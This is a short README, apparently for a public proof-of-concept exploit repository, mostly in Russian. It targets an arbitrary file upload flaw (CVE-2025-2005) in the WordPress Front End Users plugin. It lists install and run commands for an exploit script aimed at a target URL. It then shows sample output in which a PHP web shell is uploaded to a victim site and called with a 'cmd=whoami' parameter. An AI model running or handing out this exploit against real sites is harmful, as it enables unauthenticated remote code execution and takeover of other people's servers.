
WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
Этот репозиторий содержит PoC-эксплойт для плагина WordPress Front End Users (версии до 3.2.32), уязвимого к произвольной загрузке файлов из-за отсутствия проверки MIME/типа файла в форме регистрации. Это позволяет неаутентифицированным злоумышленникам загружать вредоносные файлы (например, веб-шеллы), что потенциально может привести к удаленному выполнению кода (RCE) на сервере.
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami